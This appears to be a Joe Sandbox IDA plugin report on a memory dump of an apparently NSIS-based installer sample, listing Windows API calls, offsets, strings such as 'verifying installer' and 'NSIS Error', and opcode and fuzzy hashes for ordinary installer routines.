  • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
  • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,00403347,007B5800,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
  • Part of subcall function 0040652B: CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,00403347,007B5800,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
• GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,?,0079FEF0,?,?,000003FB,?), ref: 00404947
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
  • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
  • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
  • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: A
                                                                      • API String ID: 2624150263-3554254475
                                                                      • Opcode ID: f17bf99eb9744ef0591981256be4ea8978b4dd8b1bc8bb353c7e53d074d4b920
                                                                      • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                      • Opcode Fuzzy Hash: f17bf99eb9744ef0591981256be4ea8978b4dd8b1bc8bb353c7e53d074d4b920
                                                                      • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
APIs
• GetSystemDirectoryW.KERNEL32(007A69C0,00000400), ref: 004063FA
• GetWindowsDirectoryW.KERNEL32(007A69C0,00000400,00000000,007A0F00,?,00405336,007A0F00,?), ref: 0040640D
• SHGetSpecialFolderLocation.SHELL32(6S@,?,00000000,007A0F00,?,00405336,007A0F00,?), ref: 00406449
• SHGetPathFromIDListW.SHELL32(?,007A69C0), ref: 00406457
• CoTaskMemFree.OLE32(?), ref: 00406462
• lstrcatW.KERNEL32(007A69C0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
• lstrlenW.KERNEL32(007A69C0,00000000,007A0F00,?,00405336,007A0F00,?), ref: 004064E0
Strings
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
• String ID: 6S@$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 717251189-2551480263
• Opcode ID: 6ca7045f1a7671301313a85d8900d55d77a8c8edd744d26f36594b0d48a563bf
• Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
• Opcode Fuzzy Hash: 6ca7045f1a7671301313a85d8900d55d77a8c8edd744d26f36594b0d48a563bf
• Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00404292
• GetSysColor.USER32(00000000), ref: 004042D0
• SetTextColor.GDI32(?,00000000), ref: 004042DC
• SetBkMode.GDI32(?,?), ref: 004042E8
• GetSysColor.USER32(?), ref: 004042FB
• SetBkColor.GDI32(?,?), ref: 0040430B
• DeleteObject.GDI32(?), ref: 00404325
• CreateBrushIndirect.GDI32(?), ref: 0040432F
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
• Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
• Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
• Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
• SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
  • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,?,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
• SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
Strings
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
• Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
• Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
• Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: CountTick$wsprintf
• String ID: ... %d%%$5
• API String ID: 551687249-3328568109
• Opcode ID: 2b12612690519de3068172d76ec2280cdcede413f29547579ccd35042eb19dae
• Instruction ID: 82e96eed204572331df772a9dc06b49ed9c909a247c3debab706571384c66a49
• Opcode Fuzzy Hash: 2b12612690519de3068172d76ec2280cdcede413f29547579ccd35042eb19dae
• Instruction Fuzzy Hash: 7841B171900209DBCB10DFA5DA84B9E7FB8AF44356F1442BBE915B72D0C7788B50CB99
APIs
• lstrlenW.KERNEL32(007A0F00), ref: 00405337
• lstrlenW.KERNEL32(?,007A0F00), ref: 00405347
• lstrcatW.KERNEL32(007A0F00,?,?,007A0F00), ref: 0040535A
• SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
• SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
• Opcode ID: f9f97bae3afdd1c4f1ca6782e82fa35db0496c66d131c2d1178b0595b913afc0
• Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
• Opcode Fuzzy Hash: f9f97bae3afdd1c4f1ca6782e82fa35db0496c66d131c2d1178b0595b913afc0
• Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
• GetMessagePos.USER32 ref: 00404BEC
• ScreenToClient.USER32(?,?), ref: 00404C06
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
Strings
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
• Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
• Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
• Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
APIs
• SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
• MulDiv.KERNEL32(?,00000064,?), ref: 00402E3C
• wsprintfW.USER32 ref: 00402E4C
• SetWindowTextW.USER32(?,?), ref: 00402E5C
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
Strings
• verifying installer: %d%%, xrefs: 00402E46
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
• Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
• Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
• Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
• wsprintfW.USER32 ref: 00406653
• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
Strings
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME$\
• API String ID: 2200240437-1946221925
• Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
• Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
• Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
• Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,00403347,007B5800,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
• CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
• CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,00403347,007B5800,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
• CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,00403347,007B5800,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
Strings
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
• Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
• Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
• Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
• Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
APIs
• CharNextW.USER32(?,?,?,?,004015D1,00000000,000000F0), ref: 00405C25
• CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C2A
• CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C42
Strings
Memory Dump Source
• Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
Similarity
• API ID: CharNext
• String ID: :$\
• API String ID: 3213498283-1166558509
• Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
• Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
• Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
• Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                      APIs
                                                                      • lstrcatW.KERNEL32(00000000,00000000,0040A5A8,007B4000,?,?,00000031), ref: 004017B0
                                                                      • CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,007B4000,?,?,00000031), ref: 004017D5
                                                                        • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                        • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00), ref: 00405337
                                                                        • Part of subcall function 004052FF: lstrlenW.KERNEL32(?,007A0F00), ref: 00405347
                                                                        • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,?,?,007A0F00), ref: 0040535A
                                                                        • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID:
                                                                      • API String ID: 1941528284-0
                                                                      • Opcode ID: 58fdc18d76f7bcf16c6fce6c3f21aaeb4e3bf1edbc87f50fc288292bb51d9b5e
                                                                      • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                      • Opcode Fuzzy Hash: 58fdc18d76f7bcf16c6fce6c3f21aaeb4e3bf1edbc87f50fc288292bb51d9b5e
                                                                      • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                      • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID:
                                                                      • API String ID: 3808545654-0
                                                                      • Opcode ID: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
                                                                      • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                      • Opcode Fuzzy Hash: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
                                                                      • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 2a08160353212a6e5352d7991a9f72d4257b9bf0db71b279ef6b12194f0acfdb
                                                                      • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                      • Opcode Fuzzy Hash: 2a08160353212a6e5352d7991a9f72d4257b9bf0db71b279ef6b12194f0acfdb
                                                                      • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                      • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                      • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                      • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                      • wsprintfW.USER32 ref: 00404B65
                                                                      • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s
                                                                      • API String ID: 3540041739-3551169577
                                                                      • Opcode ID: 659e19d517a3b0c3334d5d290c3650de3f4e6e8c213cad244c2b0995072c2ab2
                                                                      • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                      • Opcode Fuzzy Hash: 659e19d517a3b0c3334d5d290c3650de3f4e6e8c213cad244c2b0995072c2ab2
                                                                      • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                      APIs
                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Close$Enum
                                                                      • String ID:
                                                                      • API String ID: 464197530-0
                                                                      • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                      • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                      • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                      • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                      APIs
                                                                      • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405811
                                                                      • GetLastError.KERNEL32 ref: 00405825
                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                      • GetLastError.KERNEL32 ref: 00405844
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
